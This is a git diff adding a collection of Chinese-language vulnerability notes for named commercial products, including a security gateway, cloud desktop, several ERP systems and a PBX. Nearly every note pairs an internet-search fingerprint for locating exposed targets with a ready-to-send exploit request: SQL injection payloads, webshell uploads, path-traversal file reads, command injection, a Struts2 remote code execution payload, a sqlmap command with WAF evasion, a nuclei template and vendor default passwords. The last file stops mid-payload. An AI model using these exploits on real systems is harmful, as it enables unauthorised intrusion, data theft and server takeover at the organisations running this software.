<https://www.yuque.com/xiaokp7/ocvun2/ic9nsb113n14pwvh> \ No newline at end of file diff --git a/启明星辰天玥运维安全网关tagid参数存在SQL注入漏洞.md b/启明星辰天玥运维安全网关tagid参数存在SQL注入漏洞.md new file mode 100644 index 0000000..c75d9e7 --- /dev/null +++ b/启明星辰天玥运维安全网关tagid参数存在SQL注入漏洞.md 
@@ -0,0 +1,51 @@ +# 启明星辰天玥运维安全网关tagid参数存在SQL注入漏洞 + +# 一、漏洞简介 +天玥网络安全审计系统是针对业务环境下用户对网络内的核心IT资产和服务器进行的操作行为进行细粒度审计的合规性管理系统。 启明星辰天玥网络安全审计系统tagid参数存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 天玥运维安全网关 + +# 三、资产测绘 ++ hunter`app.name="启明星辰天玥运维安全网关"` ++ 特征 + +![1695829999514-057a6e65-a46a-4f52-ae75-8e3825de7f26.png](./img/FSinckLrORo2iEIs/1695829999514-057a6e65-a46a-4f52-ae75-8e3825de7f26-527751.png) + +# 四、漏洞复现 +```plain +POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1 +Host: xx.xx.xx.xx +Connection: close +Cache-Control: max-age=0 +sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99" +sec-ch-ua-mobile: ?0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: application/x-www-form-urlencoded +Content-Length: 39 + + +checkname=123&tagid=123 AND 5327=(SELECT 5327 FROM PG_SLEEP(5))-- OkPa +``` + +![1695830126957-ef52dde0-c4a0-4091-9a31-e48cb5479e62.png](./img/FSinckLrORo2iEIs/1695830126957-ef52dde0-c4a0-4091-9a31-e48cb5479e62-580083.png) + +sqlmap + +```plain +sqlmap -u "https://xx.xx.xx.xx/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" --skip-waf --random-agent --batch -p tagid --tamper=space2comment +``` + +![1695830139590-b1329279-4467-45bf-864d-5c0dce53ffe3.png](./img/FSinckLrORo2iEIs/1695830139590-b1329279-4467-45bf-864d-5c0dce53ffe3-600301.png) + + + +> 更新: 2024-02-29 23:57:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lli5osp0pzdm1zdo> \ No newline at end of file diff --git a/启明星辰天玥运维安全网关默认口令.md b/启明星辰天玥运维安全网关默认口令.md new file mode 100644 index 0000000..fda8df3 --- /dev/null +++ b/启明星辰天玥运维安全网关默认口令.md 
@@ -0,0 +1,28 @@ +# 启明星辰天玥运维安全网关默认口令 + +# 一、漏洞简介 +天玥网络安全审计系统是针对业务环境下用户对网络内的核心IT资产和服务器进行的操作行为进行细粒度审计的合规性管理系统。 启明星辰天玥运维安全网关存在多个默认口令 + +# 二、影响版本 ++ 天玥运维安全网关 + +# 三、资产测绘 ++ hunter`app.name="启明星辰天玥运维安全网关"` ++ 特征 + +![1695829999514-057a6e65-a46a-4f52-ae75-8e3825de7f26.png](./img/6eUffIONIfcTkeQY/1695829999514-057a6e65-a46a-4f52-ae75-8e3825de7f26-061247.png) + +# 四、漏洞复现 +```plain +sysuseradmin/sua_password$123 +sysauditor/sa_password$123 +sysadmin/password$123 +sysadmin1/sysadmin111111 +``` + +![1698595769008-9efbda7f-bc1b-4063-b4d3-854b72ff69bc.png](./img/6eUffIONIfcTkeQY/1698595769008-9efbda7f-bc1b-4063-b4d3-854b72ff69bc-263554.png) + + + +> 更新: 2024-02-29 23:57:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kx93eeqothpuo5ek> \ No newline at end of file diff --git a/员工自助平台loginByPassword存在SQL注入漏洞.md b/员工自助平台loginByPassword存在SQL注入漏洞.md new file mode 100644 index 0000000..2cb744e --- /dev/null +++ b/员工自助平台loginByPassword存在SQL注入漏洞.md 
@@ -0,0 +1,35 @@ +# 员工自助平台loginByPassword存在SQL注入漏洞 + +# 一、漏洞简介 + 广州翰智软件有限公司员工自助平台是指该公司为其员工提供的一种在线平台,旨在提高员工的工作效率、简化人力资源管理流程、增强员工的自主权和满意度。广州翰智软件有限公司员工自助平台 loginByPassword接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。 + +# 二、影响版本 ++ ShowDoc + +# 三、资产测绘 ++ fofa`<font style="color:rgb(199, 37, 78);">body="./static/hrfonts/iconfont.css"</font>` ++ 特征 + +![1717127090648-66b3e7cf-d1a8-4fc5-8007-a4fdcde6ee9f.png](./img/nEpGZuhTscZgPPDk/1717127090648-66b3e7cf-d1a8-4fc5-8007-a4fdcde6ee9f-326976.png) + +# 四、漏洞复现 +```rust +POST /hrssc/portal/plantform/loginByPassword HTTP/1.1 +Host: +Accept: application/json, text/plain, */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Type: application/json +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Content-Length: 40 +Connection: close + +{"userName":"admin' AND 8383=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(98)||CHR(97)||CHR(122),5)-- eWnt","password":"admin"} +``` + +![1717127299072-04b69d65-65a2-42cc-a9e7-ec94f961e688.png](./img/nEpGZuhTscZgPPDk/1717127299072-04b69d65-65a2-42cc-a9e7-ec94f961e688-403036.png) + + + +> 更新: 2024-06-01 11:14:22 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gy1kmhftuc02g8h8> \ No newline at end of file diff --git a/和信创天云桌面系统newserver远程命令执行漏洞.md b/和信创天云桌面系统newserver远程命令执行漏洞.md new file mode 100644 index 0000000..ae54ccc --- /dev/null +++ b/和信创天云桌面系统newserver远程命令执行漏洞.md 
@@ -0,0 +1,57 @@ +# 和信创天云桌面系统newserver远程命令执行漏洞 + +和信创天云桌面系统newserver远程命令执行漏洞 + +## fofa + +```javascript +icon_hash="-1515283145" || title="和信下一代云桌面VENGD" +``` + +## poc + +```javascript +POST /vesystem/index.php/New/Fn/newserver HTTP/1.1 +Host: +Accept-Encoding: gzip +Connection: close +Content-Length: 118 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +ip=`ping dnslog`&user=1&pwd=1&type=1&c_type=1&local=1&server_os_str=1&server_os_version_str=1 +``` + + + +## yaml + +```yaml +id: fox-template + +info: + name: fox-template + author: fox + severity: high + +http: + - raw: + - | + POST /vesystem/index.php/New/Fn/newserver HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip + Connection: close + Content-Length: 118 + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + + ip=`ping {{interactsh-url}}`&user=1&pwd=1&type=1&c_type=1&local=1&server_os_str=1&server_os_version_str=1 + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # 配合 {{interactsh-url}} 关键词使用 + words: + - "dns" +``` + diff --git a/和信创天云桌面系统upload_file存在任意文件上传.md b/和信创天云桌面系统upload_file存在任意文件上传.md new file mode 100644 index 0000000..3a97213 --- /dev/null +++ b/和信创天云桌面系统upload_file存在任意文件上传.md 
@@ -0,0 +1,49 @@ +# 和信创天云桌面系统upload_file存在任意文件上传 + +# 一、漏洞简介 +和信创天专注虚拟化云计算领域,为首家集VOI/VDI/IDV于一体的云桌面厂家,助力教育、医疗、政企、军工、电力、金融等行业客户实现千台终端统一管理,确保数据安全与业务连续性。和信下一代云桌面基于VDI/VOI/IDV三种技术架构优势,对于用户应用场景有着普遍的适用性,前后端混合计算保证在调度服务器后端资源的同时,也能充分利用前端计算资源,高性能的电脑和低功耗的瘦终端均能流畅地运行各种操作系统与应用软件,能够轻松实现千点以上大规模终端的集中管理。和信创天云桌面系统upload_file存在任意文件上传,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 和信创天云桌面系统 + +# 三、资产测绘 ++ hunter`web.body="和信下一代云桌面"` ++ 特征 + +![1700670558533-55a9d1bc-a7a3-4007-ba7d-54decc95331c.png](./img/L3khDGEcH1tVVfGk/1700670558533-55a9d1bc-a7a3-4007-ba7d-54decc95331c-942950.png) + +# 四、漏洞复现 +```python +POST /Upload/upload_file.php?l=1 HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8 +Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6 +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv +Content-Length: 192 + +------WebKitFormBoundaryfcKRltGv +Content-Disposition: form-data; name="file"; filename="test.php" +Content-Type: image/avif + +<?php phpinfo(); ?> +------WebKitFormBoundaryfcKRltGv-- +``` + +![1700670586959-6ff525af-136b-4194-904a-dd8f1474a990.png](./img/L3khDGEcH1tVVfGk/1700670586959-6ff525af-136b-4194-904a-dd8f1474a990-710340.png) + +上传文件位置 + +```python +/Upload/1/test.php +``` + +![1700670612940-6bcb01bb-5acb-4705-b6d8-5e9f19145375.png](./img/L3khDGEcH1tVVfGk/1700670612940-6bcb01bb-5acb-4705-b6d8-5e9f19145375-550414.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/im6hi1mdzqn6l81q> \ No newline at end of file diff --git a/哲霖机械ERP接口DownloadInpFile存在任意文件读取漏洞.md b/哲霖机械ERP接口DownloadInpFile存在任意文件读取漏洞.md new file mode 100644 index 0000000..ccca6f6 --- /dev/null +++ b/哲霖机械ERP接口DownloadInpFile存在任意文件读取漏洞.md 
@@ -0,0 +1,23 @@ +# 哲霖机械ERP接口DownloadInpFile存在任意文件读取漏洞 + +哲霖机械ERP DownloadInpFile 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +```javascript +body="Api/UserApi/GetUserName" +``` + +## poc + +```javascript +GET /Basics/DownloadInpFile?filePath=C:\windows\win.ini HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +``` + +![46554740fd4b4fe7abd8dca35c7e629b.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132235284.png) \ No newline at end of file diff --git a/唯徳知识产权管理系统DownloadFileWordTemplate接口存在文件读取漏洞.md b/唯徳知识产权管理系统DownloadFileWordTemplate接口存在文件读取漏洞.md new file mode 100644 index 0000000..c279ff1 --- /dev/null +++ b/唯徳知识产权管理系统DownloadFileWordTemplate接口存在文件读取漏洞.md 
@@ -0,0 +1,30 @@ +# 唯徳知识产权管理系统DownloadFileWordTemplate接口存在文件读取漏洞 + +唯徳知识产权管理系统 DownloadFileWordTemplate 接口存在文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +```javascript +body="JSCOMM/language.js" +``` + +## poc + +```javascript +POST /AutoUpdate/WSFM.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/DownloadFileWordTemplate" + +<?xml version="1.0" encoding="utf-8"?> +<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> + <soap:Body> + <DownloadFileWordTemplate xmlns="http://tempuri.org/"> + <fileName>../../web.config</fileName> + </DownloadFileWordTemplate> + </soap:Body> +</soap:Envelope> +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141639464.png) \ No newline at end of file diff --git a/唯徳知识产权管理系统WSFM.asmx接口存在任意文件上传漏洞.md b/唯徳知识产权管理系统WSFM.asmx接口存在任意文件上传漏洞.md new file mode 100644 index 0000000..fe67fab --- /dev/null +++ b/唯徳知识产权管理系统WSFM.asmx接口存在任意文件上传漏洞.md 
@@ -0,0 +1,35 @@ +# 唯徳知识产权管理系统WSFM.asmx接口存在任意文件上传漏洞 + +唯徳知识产权管理系统 /AutoUpdate/WSFM.asmx 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa + +```javascript +body="JSCOMM/language.js" +``` + +## poc + +```javascript +POST /AutoUpdate/WSFM.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/UploadFileWordTemplate" + +<?xml version="1.0" encoding="utf-8"?> +<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> + <soap:Body> + <UploadFileWordTemplate xmlns="http://tempuri.org/"> + <fileByteArray>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</fileByteArray> + <remotePath>/TemplateFiles/rce.aspx</remotePath> + </UploadFileWordTemplate> + </soap:Body> +</soap:Envelope> +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141637528.png) + + + +文件路径:`\TemplateFiles\rce.aspx` \ No newline at end of file diff --git a/商混ERP系统接口Operater_Action.aspx存在SQL注入漏洞.md b/商混ERP系统接口Operater_Action.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..68a47cc --- /dev/null +++ b/商混ERP系统接口Operater_Action.aspx存在SQL注入漏洞.md 
@@ -0,0 +1,23 @@ +## 商混ERP系统接口Operater_Action.aspx存在SQL注入漏洞 + +商混ERP系统 **Operater_Action.aspx**接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa + +```javascript +title="商混ERP系统" +``` + +## poc + +```javascript +GET /Dispatch/Operater_Action.aspx?action=TaskComplete&id=1%27WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141642074.png) \ No newline at end of file diff --git a/商混ERP系统接口StockreceiveEdit.aspx存在SQL注入漏洞.md b/商混ERP系统接口StockreceiveEdit.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..71c6593 --- /dev/null +++ b/商混ERP系统接口StockreceiveEdit.aspx存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +## 商混ERP系统接口StockreceiveEdit.aspx存在SQL注入漏洞 + +商混ERP系统 StockreceiveEdit.aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa +```javascript +title="商混ERP系统" +``` + +## poc +```javascript +GET /ERP/StockreceiveEdit.aspx?id=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +``` + +![84d3ac1b3fae42b6b8c215f24af8f95e.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141641376.png) diff --git a/商混ERP系统接口TaskCarToQueue.aspx存在SQL注入漏洞.md b/商混ERP系统接口TaskCarToQueue.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..2609cc0 --- /dev/null +++ b/商混ERP系统接口TaskCarToQueue.aspx存在SQL注入漏洞.md 
@@ -0,0 +1,21 @@ +## 商混ERP系统接口TaskCarToQueue.aspx存在SQL注入漏洞 + +商混ERP系统 TaskCarToQueue.aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa +```javascript +title="商混ERP系统" +``` + +## poc +```javascript +GET /Dispatch/TaskCarToQueue.aspx?action=addqueue&id=%27WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +``` + +![image-20240919110956450](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191109679.png) diff --git a/国威HB1910数字程控电话交换机generate.php未授权RCE漏洞.md b/国威HB1910数字程控电话交换机generate.php未授权RCE漏洞.md new file mode 100644 index 0000000..74365af --- /dev/null +++ b/国威HB1910数字程控电话交换机generate.php未授权RCE漏洞.md @@ -0,0 +1,23 @@ +# 国威HB1910数字程控电话交换机generate.php未授权RCE漏洞 + +国威HB1910数字程控电话交换机 generate.php 接口存在远程命令执行漏洞,未经身份验证的恶意攻击者可以利用该漏洞远程执行任意命令,写入webshell后门文件,获取服务器权限。 + +## fofa + +```javascript +body="themes/tenant/css/login.css" +``` + +## fofa + +```javascript +GET /modules/ping/generate.php?send=Ping&hostname=;id HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +``` + +![image-20241219145844556](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191458610.png) \ No newline at end of file diff --git a/圣乔ERP系统SingleRowQueryConvertor存在SQL注入漏洞.md b/圣乔ERP系统SingleRowQueryConvertor存在SQL注入漏洞.md new file mode 100644 index 0000000..d835e88 --- /dev/null +++ b/圣乔ERP系统SingleRowQueryConvertor存在SQL注入漏洞.md 
@@ -0,0 +1,35 @@ +# 圣乔ERP系统SingleRowQueryConvertor存在SQL注入漏洞 + +圣乔ERP系统 SingleRowQueryConvertor接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息 + +## fofa + +```javascript +title="圣乔ERP系统" +``` + +## poc + +```javascript +POST /erp/dwr/call/plaincall/SingleRowQueryConvertor.queryForString.dwr HTTP/1.1 +Host: +Content-Type: text/plain +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Priority: u=0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 + +callCount=1 +page=/erp/dwr/test/SingleRowQueryConvertor +httpSessionId= +scriptSessionId=D528B0534A8BE018344AB2D54E02931D86 +c0-scriptName=SingleRowQueryConvertor +c0-methodName=queryForString +c0-id=0 +c0-param0=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (99=99) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) +c0-param1=Array:[] +batchId=0 +``` + +![image-20241211210352012](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112103078.png) \ No newline at end of file diff --git a/圣乔ERP系统downloadFile.action任意文件读取漏洞.md b/圣乔ERP系统downloadFile.action任意文件读取漏洞.md new file mode 100644 index 0000000..038294a --- /dev/null +++ b/圣乔ERP系统downloadFile.action任意文件读取漏洞.md 
@@ -0,0 +1,20 @@ +# 圣乔ERP系统downloadFile.action任意文件读取漏洞 + +圣乔ERP系统 downloadFile.action 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件。 + +## fofa +```javascript +app="圣乔-ERP系统" +``` + +## poc +```javascript +GET /erp/wap/../downloadFile.action?absolutePath=true&file=c:\\windows\win.ini HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20241219152120711](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191521762.png) \ No newline at end of file diff --git a/圣乔ERP系统getSupplyQueryKeyword存在SQL注入漏洞.md b/圣乔ERP系统getSupplyQueryKeyword存在SQL注入漏洞.md new file mode 100644 index 0000000..c65196d --- /dev/null +++ b/圣乔ERP系统getSupplyQueryKeyword存在SQL注入漏洞.md @@ -0,0 +1,33 @@ +# 圣乔ERP系统getSupplyQueryKeyword存在SQL注入漏洞 + +圣乔ERP系统 getSupplyQueryKeyword接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息 + +## fofa + +```javascript +title="圣乔ERP系统" +``` + +## poc + +```javascript +POST /erp/dwr/call/plaincall/DwrUtil.getSupplyQueryKeyword.dwr HTTP/1.1 +Host: +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Priority: u=0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 +Content-Type: text/plain +Accept-Encoding: gzip, deflate + +callCount=1 +page=/erp/dwr/test/DwrUtil +httpSessionId= +scriptSessionId=7D0BA25CD588C62EB9A08A089C7F368D561 +c0-scriptName=DwrUtil +c0-methodName=getSupplyQueryKeyword +c0-id=0 +c0-param0=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (99=99) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) +batchId=9 +``` + diff --git a/圣乔ERP系统login.action存在Struts2远程代码执行漏洞.md b/圣乔ERP系统login.action存在Struts2远程代码执行漏洞.md new file mode 100644 index 0000000..57899ce --- /dev/null 
+++ b/圣乔ERP系统login.action存在Struts2远程代码执行漏洞.md @@ -0,0 +1,27 @@ +# 圣乔ERP系统login.action存在Struts2远程代码执行漏洞 + +圣乔ERP系统是杭州圣乔科技有限公司开发的一款企业级管理软件,旨在为企业提供一套全面、集成化的管理解决方案,帮助企业实现资源的优化配置和高效利用。该系统集成了财务、人力资源、生产、销售、供应链等多个业务模块,实现了企业内外部信息的无缝连接和实时共享。适用于各种规模的企业,特别是需要实现资源优化配置、提高运营效率和管理水平的企业。它可以帮助企业解决传统管理方式中存在的信息孤岛、数据重复输入、信息传递滞后等问题,提高企业的整体竞争力。由于圣乔ERP系统使用Struts2开发框架组件,存在历史Struts2远程代码执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统命令,写入后门文件,获取服务器权限。 + +## fofa + +```javascript +title="圣乔ERP系统" +``` + +## poc + +```javascript +POST /erp/login.action HTTP/1.1 +Host: +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Priority: u=0, i +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded + +redirect:%24%7B%23resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%27whoami%27%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23dis%3Dnew+java.io.DataInputStream%28%23b%29%2C%23buf%3Dnew+byte%5B20000%5D%2C%23dis.read%28%23buf%29%2C%23msg%3Dnew+java.lang.String%28%23buf%29%2C%23dis.close%28%29%2C%23resp.getWriter%28%29.println%28%23msg.trim%28%29%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D +``` + +![image-20241128093556493](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280935554.png) \ No newline at end of file diff --git a/圣乔ERP系统queryForMapWithDefaultValues存在SQL注入漏洞.md b/圣乔ERP系统queryForMapWithDefaultValues存在SQL注入漏洞.md new file mode 100644 index 0000000..67d8fe0 --- /dev/null +++ b/圣乔ERP系统queryForMapWithDefaultValues存在SQL注入漏洞.md 
@@ -0,0 +1,34 @@ +# 圣乔ERP系统queryForMapWithDefaultValues存在SQL注入漏洞 + +圣乔ERP系统 queryForMapWithDefaultValues接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息 + +## fofa + +```javascript +title="圣乔ERP系统" +``` + +## poc + +```javascript +POST /erp/dwr/call/plaincall/ResultSetConvertor.queryForMapWithDefaultValues.dwr HTTP/1.1 +Host: +Content-Type: text/plain +Priority: u=0 +Accept-Encoding: gzip, deflate +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + +callCount=1 +page=/erp/dwr/test/ResultSetConvertor +httpSessionId= +scriptSessionId=B4C02555EA992FF3A73F3CCA60389809871 +c0-scriptName=ResultSetConvertor +c0-methodName=queryForMapWithDefaultValues +c0-id=0 +c0-param0=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (99=99) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) +c0-param1=Array:[] +batchId=4 +``` + diff --git a/圣乔ERP系统queryForString存在SQL注入漏洞.md b/圣乔ERP系统queryForString存在SQL注入漏洞.md new file mode 100644 index 0000000..9c204a9 --- /dev/null +++ b/圣乔ERP系统queryForString存在SQL注入漏洞.md 
@@ -0,0 +1,35 @@ +# 圣乔ERP系统queryForString存在SQL注入漏洞 + +圣乔ERP系统 queryForString 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息 + +## fofa + +```javascript +title="圣乔ERP系统" +``` + +## poc + +```javascript +POST /erp/dwr/call/plaincall/NamedParameterSingleRowQueryConvertor.queryForString.dwr HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: application/x-www-form-urlencoded; charset=utf-8 +Connection: close + +c0-id=0 +batchId=0 +callCount=1 +c0-param1=Object_Object:{} +page=/erp/dwr/test/NamedParameterSingleRowQueryConvertor +httpSessionId=47CA299619667847F1BB450454E6C2D4 +scriptSessionId=F3F037EB7A5102043AD4CEB47EB17A7275 +c0-scriptName=NamedParameterSingleRowQueryConvertor +c0-methodName=queryForString +c0-param0=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (99=99) THEN 1 ELSE 0 END) FROM 